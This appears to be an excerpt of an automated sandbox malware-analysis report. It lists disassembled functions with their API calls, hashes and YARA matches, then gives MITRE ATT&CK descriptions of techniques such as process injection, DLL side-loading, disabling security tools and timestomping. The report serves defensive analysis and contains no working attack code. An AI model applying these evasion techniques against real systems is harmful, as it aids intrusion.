Concurrency::cancel_current_task.LIBCPMT ref: 0000020933533B36

Memory Dump Source

Source File: 00000009.00000002.1754255059.00000209334E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000209334E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_209334e0000_sUKFphHSzX.jbxd

Yara matches

Similarity

API ID: std::_$LockitLockit::_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 1168246061-0
Opcode ID: 268a738e79390acd07def2dc4d1be91678e0d7bbd421806bae9408622498fc9b
Instruction ID: 22a56b7c39e48f173b36fb5f29458f2a0c6fb04a4390109bf411115c232b6f0c
Opcode Fuzzy Hash: 268a738e79390acd07def2dc4d1be91678e0d7bbd421806bae9408622498fc9b
Instruction Fuzzy Hash: B741AE62284B4095EA11DB15E8D935D7760F3D9BA8F5882A2FA4F477A7DF38C4C2CB00

Function 0000020933554940 Relevance: 6.1, APIs: 4, Instructions: 90COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 000002093355496B
std::_Lockit::_Lockit.LIBCPMT ref: 0000020933554990
std::_Facet_Register.LIBCPMT ref: 0000020933554A3B
Concurrency::cancel_current_task.LIBCPMT ref: 0000020933554A86

Memory Dump Source

Source File: 00000009.00000002.1754255059.00000209334E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000209334E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_209334e0000_sUKFphHSzX.jbxd

Yara matches

Similarity

API ID: std::_$LockitLockit::_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 1168246061-0
Opcode ID: 225fe1b72370eebaf99dac6ca4c61f0c7a8ae1283e1f422937767657019483ac
Instruction ID: 84313c95eb11b66253b2f1440aea831b2a2b25765886d49c9751776836e61bef
Opcode Fuzzy Hash: 225fe1b72370eebaf99dac6ca4c61f0c7a8ae1283e1f422937767657019483ac
Instruction Fuzzy Hash: 77419162294B4085FA11DB16E4CA35A7371F3C9B94F588191AA5F07BA7DF38D4C1CB10

Function 00000209335540C0 Relevance: 6.1, APIs: 4, Instructions: 90COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00000209335540EB
std::_Lockit::_Lockit.LIBCPMT ref: 0000020933554110
std::_Facet_Register.LIBCPMT ref: 00000209335541BB
Concurrency::cancel_current_task.LIBCPMT ref: 0000020933554206

Memory Dump Source

Source File: 00000009.00000002.1754255059.00000209334E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000209334E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_209334e0000_sUKFphHSzX.jbxd

Yara matches

Similarity

API ID: std::_$LockitLockit::_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 1168246061-0
Opcode ID: f751cf97cbdb91efc437d10692cdb5900781dee89e6afe037389110580d2090b
Instruction ID: 92deaf0f83ab60527818e2c44f3acfbee8f08efb92c4f8d15c7d6c577a893267
Opcode Fuzzy Hash: f751cf97cbdb91efc437d10692cdb5900781dee89e6afe037389110580d2090b
Instruction Fuzzy Hash: A2419261290B8095FA15DB16E8C935E7360F3D9B98F588251FA4F07BA7DE38D4C2CB10

Function 0000020933521DD0 Relevance: 6.1, APIs: 4, Instructions: 90COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0000020933521DFB
std::_Lockit::_Lockit.LIBCPMT ref: 0000020933521E20
std::_Facet_Register.LIBCPMT ref: 0000020933521ECB
Concurrency::cancel_current_task.LIBCPMT ref: 0000020933521F16

Memory Dump Source

Source File: 00000009.00000002.1754255059.00000209334E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000209334E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_209334e0000_sUKFphHSzX.jbxd

Yara matches

Similarity

API ID: std::_$LockitLockit::_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 1168246061-0
Opcode ID: deae80201b058b93dee9511eb23f4883bce05ec3d16f28b31309998fe1f492bf
Instruction ID: e3df790990ca722f3ea014598f3cc38d209e505df9de97a9f03ee0259a58f4e4
Opcode Fuzzy Hash: deae80201b058b93dee9511eb23f4883bce05ec3d16f28b31309998fe1f492bf
Instruction Fuzzy Hash: 04418222684B4095EA11DB16E8C935A7760F3D8BA8F5885A1FA4F477A7DF38C5C28B10

Function 0000020933599704 Relevance: 6.1, APIs: 4, Instructions: 53COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32 ref: 000002093359974D
GetLastError.KERNEL32 ref: 000002093359975B
WideCharToMultiByte.KERNEL32 ref: 0000020933599790
GetLastError.KERNEL32 ref: 000002093359979E

Memory Dump Source

Source File: 00000009.00000002.1754255059.00000209334E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000209334E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_209334e0000_sUKFphHSzX.jbxd

Yara matches

Similarity

API ID: ByteCharErrorLastMultiWide
String ID:
API String ID: 203985260-0
Opcode ID: 885017ec562e008ced87b7a088d7b161d23e12804f5abb955417809e776ebcf4
Instruction ID: c65550bc9ce09dc1e46f57d4c3ea10941ef05f43b73d82d12f20803a5d9d6e0a
Opcode Fuzzy Hash: 885017ec562e008ced87b7a088d7b161d23e12804f5abb955417809e776ebcf4
Instruction Fuzzy Hash: 08212E76614B84C7E3108F21E88831EB6B5F3D9F94F248169EB8A57B56DF39C4418F40

Function 0000020933599BF0 Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 0000020933599520: GetModuleHandleW.KERNEL32 ref: 0000020933599536
Part of subcall function 0000020933599520: GetProcAddress.KERNEL32 ref: 0000020933599546

GetLastError.KERNEL32 ref: 0000020933599C14

Part of subcall function 0000020933577BC4: IsProcessorFeaturePresent.KERNEL32 ref: 0000020933577BEA

GetFileAttributesW.KERNEL32 ref: 0000020933599C23
__std_fs_open_handle.LIBCPMT ref: 0000020933599C4C
CloseHandle.KERNEL32 ref: 0000020933599C5E

Memory Dump Source

Source File: 00000009.00000002.1754255059.00000209334E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000209334E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_209334e0000_sUKFphHSzX.jbxd

Yara matches

Similarity

API ID: Handle$AddressAttributesCloseErrorFeatureFileLastModulePresentProcProcessor__std_fs_open_handle
String ID:
API String ID: 156590933-0
Opcode ID: ab22cb6cb8c17ed70bd3674071cc7aa31663a6931c8f4e60418ec3b925b4023f
Instruction ID: bcabe1beb774bce22a4dbbfc664d38326e32699dc9d64fc71d31cd6fd045fd36
Opcode Fuzzy Hash: ab22cb6cb8c17ed70bd3674071cc7aa31663a6931c8f4e60418ec3b925b4023f
Instruction Fuzzy Hash: 90119E2129474085FB605B26A8CC32A67A2E7C67F0F149650FA7F86AE7DB38C4C08F00

Function 00007FF6CFA5DB00 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF6CFA5DB2C
GetCurrentThreadId.KERNEL32 ref: 00007FF6CFA5DB3A
GetCurrentProcessId.KERNEL32 ref: 00007FF6CFA5DB46
QueryPerformanceCounter.KERNEL32 ref: 00007FF6CFA5DB56

Memory Dump Source

Source File: 00000009.00000002.1754955296.00007FF6CFA31000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF6CFA30000, based on PE: true

Associated: 00000009.00000002.1754933672.00007FF6CFA30000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755056820.00007FF6CFA68000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755056820.00007FF6CFCA6000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755229476.00007FF6CFCB0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755293595.00007FF6CFCB3000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff6cfa30000_sUKFphHSzX.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 1d716b8a3445a5a0872bb1fe03444624e5d71f17f3b0535b1150a759f8b14a6e
Instruction ID: 67f3111e23aa4cfb2327c0af42c6b427d2d6dcea65d56b61e889379511ad52a9
Opcode Fuzzy Hash: 1d716b8a3445a5a0872bb1fe03444624e5d71f17f3b0535b1150a759f8b14a6e
Instruction Fuzzy Hash: 88112A26B55F058AEB00CFA4E8542B933B4FB1975AF440E31EAADC7BA4DF78D1948350

Function 000002093358DC18 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 000002093358DC44
GetCurrentThreadId.KERNEL32 ref: 000002093358DC52
GetCurrentProcessId.KERNEL32 ref: 000002093358DC5E
QueryPerformanceCounter.KERNEL32 ref: 000002093358DC6E

Memory Dump Source

Source File: 00000009.00000002.1754255059.00000209334E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000209334E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_209334e0000_sUKFphHSzX.jbxd

Yara matches

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: f06392d29159ea5021ae0933302a5494cfde722d0989828b5d6bd782ea4d1856
Instruction ID: 641665f0068949eb01f08ea5936e49ee1440245a2ddd5a79cef142050317187a
Opcode Fuzzy Hash: f06392d29159ea5021ae0933302a5494cfde722d0989828b5d6bd782ea4d1856
Instruction Fuzzy Hash: 2B115632754F049AEB00DF60EC9A3A833A4F359758F440E21EE6E47766DF78C1948790

Function 000002093350EAA0 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 207COMMON

Download Yara Rule

Strings

[json.exception., xrefs: 000002093350EBDB

Memory Dump Source

Source File: 00000009.00000002.1754255059.00000209334E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000209334E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_209334e0000_sUKFphHSzX.jbxd

Yara matches

Similarity

API ID:
String ID: [json.exception.
API String ID: 0-791563284
Opcode ID: 8eeeef443231292cad7fbe637a88c06e8697e3811d02d34648575083ccca53aa
Instruction ID: 86d6abee5efba73a7d19dba10d0e89fab9a50996e115c7172887bdcd939163b8
Opcode Fuzzy Hash: 8eeeef443231292cad7fbe637a88c06e8697e3811d02d34648575083ccca53aa
Instruction Fuzzy Hash: 3071E063B90B8085F700CF7AE88439D67A1E7D5B94F648255EE9A17B9BDB79C0C18700

Function 0000020933554EC0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 131COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0000020933554F2F
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0000020933554F77

Strings

bad locale name, xrefs: 000002093355504C

Memory Dump Source

Source File: 00000009.00000002.1754255059.00000209334E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000209334E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_209334e0000_sUKFphHSzX.jbxd

Yara matches

Similarity

API ID: std::_$Locinfo::_Locinfo_ctorLockitLockit::_
String ID: bad locale name
API String ID: 3988782225-1405518554
Opcode ID: 5db8a760b0bd0dccc9b2e170d7f55a42758171ca5bae2ba3cf5a463648ff30a1
Instruction ID: a645f9deea1d353c7a407f6e6dd706278ff93b4e9a482f02aaeb71e4f1f72f7e
Opcode Fuzzy Hash: 5db8a760b0bd0dccc9b2e170d7f55a42758171ca5bae2ba3cf5a463648ff30a1
Instruction Fuzzy Hash: 99514732382B408AFB14DFB1D4943AC33A4EB84B48F489465FA4F67AA7DE34C5A58754

Function 0000020933534780 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 124COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00000209335347EF
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0000020933534837

Strings

bad locale name, xrefs: 0000020933534916

Memory Dump Source

Source File: 00000009.00000002.1754255059.00000209334E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000209334E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_209334e0000_sUKFphHSzX.jbxd

Yara matches

Similarity

API ID: std::_$Locinfo::_Locinfo_ctorLockitLockit::_
String ID: bad locale name
API String ID: 3988782225-1405518554
Opcode ID: fbd9759ae22cead990589468d0bc35c719fe4b6592ecd760d4b6df2f289dfce5
Instruction ID: 3ea774da009374a90b0714607bae66103c37aa22e3c37119dac2cccfa674ebd1
Opcode Fuzzy Hash: fbd9759ae22cead990589468d0bc35c719fe4b6592ecd760d4b6df2f289dfce5
Instruction Fuzzy Hash: AD515A32382B808AFB14DFB0D4943EC73A4EB94748F448565FA4E67A97DE34C5A5C714

Function 0000020933581068 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 122COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0000020933586448: _invalid_parameter_noinfo.LIBCMT ref: 000002093358647B

_get_daylight.LIBCMT ref: 0000020933581180
_get_daylight.LIBCMT ref: 0000020933581191

Strings

?, xrefs: 0000020933581111

Memory Dump Source

Source File: 00000009.00000002.1754255059.00000209334E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000209334E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_209334e0000_sUKFphHSzX.jbxd

Yara matches

Similarity

API ID: _get_daylight$_invalid_parameter_noinfo
String ID: ?
API String ID: 1286766494-1684325040
Opcode ID: ee72351df311ff027eaf8af198dd50b8868fef75caf7a1d708de55c1de70a8ab
Instruction ID: e1510dbd7a84fd7b508bd6000dee2510722fada2fdb1f9b27f6f576d5a888dfe
Opcode Fuzzy Hash: ee72351df311ff027eaf8af198dd50b8868fef75caf7a1d708de55c1de70a8ab
Instruction Fuzzy Hash: 1441F9223447C096FB649726E4993696690E7C0BA4F14C365FE5E4BBD7DA38C9C18F00

Function 000002093357AF20 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 000002093357B037
GetLastError.KERNEL32 ref: 000002093357B059

Strings

U, xrefs: 000002093357AFE3

Memory Dump Source

Source File: 00000009.00000002.1754255059.00000209334E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000209334E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_209334e0000_sUKFphHSzX.jbxd

Yara matches

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: 95c1b5a9b453dd21b53d1d3abd175e481a437f6821d85bbfa209bab1ceee3d57
Instruction ID: dccc11467e4b6bc23167c9002dd9ee7802bb47b1da21d6d1f313106c6f2c0dbb
Opcode Fuzzy Hash: 95c1b5a9b453dd21b53d1d3abd175e481a437f6821d85bbfa209bab1ceee3d57
Instruction Fuzzy Hash: 6841B562315B8086DB10CF65E8893A977A0F7D8784F408121FE4E87796DF3CC581CB40

Function 00007FF6CFA42C62 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00007FF6CFA42CB8
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CFA42CF4

Strings

Number is too big., xrefs: 00007FF6CFA42CB1

Memory Dump Source

Source File: 00000009.00000002.1754955296.00007FF6CFA31000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF6CFA30000, based on PE: true

Associated: 00000009.00000002.1754933672.00007FF6CFA30000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755056820.00007FF6CFA68000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755056820.00007FF6CFCA6000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755229476.00007FF6CFCB0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755293595.00007FF6CFCB3000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff6cfa30000_sUKFphHSzX.jbxd

Similarity

API ID: Xinvalid_argument_invalid_parameter_noinfo_noreturnstd::_
String ID: Number is too big.
API String ID: 1132134225-3173473636
Opcode ID: c199d333f1b9cab04b9b1dbb8748059f08981d1f8fb7dc04a3d92c236ba5b13e
Instruction ID: bbd44939b3e5165d2036fd41ded9b0de6b12583db9623f793e1a2d271bf01689
Opcode Fuzzy Hash: c199d333f1b9cab04b9b1dbb8748059f08981d1f8fb7dc04a3d92c236ba5b13e
Instruction Fuzzy Hash: FA111AA3C081078FF65A6EB0445A1F9AF90DF61313FE11D34E6E887993BC1D75064570

Function 00007FF6CFA42B32 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00007FF6CFA42B88
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CFA42BC4

Strings

Number is too big., xrefs: 00007FF6CFA42B81

Memory Dump Source

Source File: 00000009.00000002.1754955296.00007FF6CFA31000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF6CFA30000, based on PE: true

Associated: 00000009.00000002.1754933672.00007FF6CFA30000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755056820.00007FF6CFA68000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755056820.00007FF6CFCA6000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755229476.00007FF6CFCB0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755293595.00007FF6CFCB3000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff6cfa30000_sUKFphHSzX.jbxd

Similarity

API ID: Xinvalid_argument_invalid_parameter_noinfo_noreturnstd::_
String ID: Number is too big.
API String ID: 1132134225-3173473636
Opcode ID: e27543cdf6f61a29e8ddc80b75bd824cddccc2a0fb75e3bf775b0164ce3b1caa
Instruction ID: 0bc8380b386337e09efd24d1b0fac4b678dc00c9a494bf0886404679b80b73e5
Opcode Fuzzy Hash: e27543cdf6f61a29e8ddc80b75bd824cddccc2a0fb75e3bf775b0164ce3b1caa
Instruction Fuzzy Hash: B7116D2280C2878FE205EFB8845B4BDBFA09F01A19F245E35DBE883987DD1DB4908B51

Function 00007FF6CFA5EDA4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6CFA31E0F), ref: 00007FF6CFA5EDF4
RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6CFA31E0F), ref: 00007FF6CFA5EE35

Strings

csm, xrefs: 00007FF6CFA5EE22

Memory Dump Source

Source File: 00000009.00000002.1754955296.00007FF6CFA31000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF6CFA30000, based on PE: true

Associated: 00000009.00000002.1754933672.00007FF6CFA30000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755056820.00007FF6CFA68000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755056820.00007FF6CFCA6000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755229476.00007FF6CFCB0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755293595.00007FF6CFCB3000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff6cfa30000_sUKFphHSzX.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 1d5299c32aecaf4e52da69cfbe893816f0db3639ef3e806bbd38833a72797da0
Instruction ID: c669c526cf9d7ad0f97f8352e3a40cf27baf721093f90c0a42aaa7d3f8054eb0
Opcode Fuzzy Hash: 1d5299c32aecaf4e52da69cfbe893816f0db3639ef3e806bbd38833a72797da0
Instruction Fuzzy Hash: CA112B32618B4182EB658F55E444269B7E4FB88B89F584630EFCC87768DF3CD551CB40

Function 000002093358F198 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlPcToFileHeader.KERNEL32 ref: 000002093358F1E8
RaiseException.KERNEL32 ref: 000002093358F229

Strings

csm, xrefs: 000002093358F216

Memory Dump Source

Source File: 00000009.00000002.1754255059.00000209334E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000209334E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_209334e0000_sUKFphHSzX.jbxd

Yara matches

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 4d2c4101b9d2858735cfea5a09a2e9289d44dfdbc7b24173af3d04f9105eea82
Instruction ID: b342e4e283ed0112d4372dc2ec5e305386042f0b6b64e2f7ef146f468c3dc106
Opcode Fuzzy Hash: 4d2c4101b9d2858735cfea5a09a2e9289d44dfdbc7b24173af3d04f9105eea82
Instruction Fuzzy Hash: 27112E32214B8482EB618B15F48425977E4F7C8B94F588265EE8E47B5ADF38C991CB00

Function 00007FF6CFA3D2D0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CFA3D99C
std::_Xinvalid_argument.LIBCPMT ref: 00007FF6CFA3D9A9

Strings

String pointer is null., xrefs: 00007FF6CFA3D9A2

Memory Dump Source

Source File: 00000009.00000002.1754955296.00007FF6CFA31000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF6CFA30000, based on PE: true

Associated: 00000009.00000002.1754933672.00007FF6CFA30000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755056820.00007FF6CFA68000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755056820.00007FF6CFCA6000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755229476.00007FF6CFCB0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755293595.00007FF6CFCB3000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff6cfa30000_sUKFphHSzX.jbxd

Similarity

API ID: Xinvalid_argument_invalid_parameter_noinfo_noreturnstd::_
String ID: String pointer is null.
API String ID: 1132134225-696828624
Opcode ID: 21e1dd80da370428b582362b5689f4aa856f83e19341bdea015bb3c94b807656
Instruction ID: b5d46dfd5108c3cbc63c801b0fc874e6f86590f0dc4c9c70efd59d0e8b7252c6
Opcode Fuzzy Hash: 21e1dd80da370428b582362b5689f4aa856f83e19341bdea015bb3c94b807656
Instruction Fuzzy Hash: 21F0BE25618A8596E6148F66BC15BFAA370BF4979AF504931FE8C43769CE3CE115C210

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

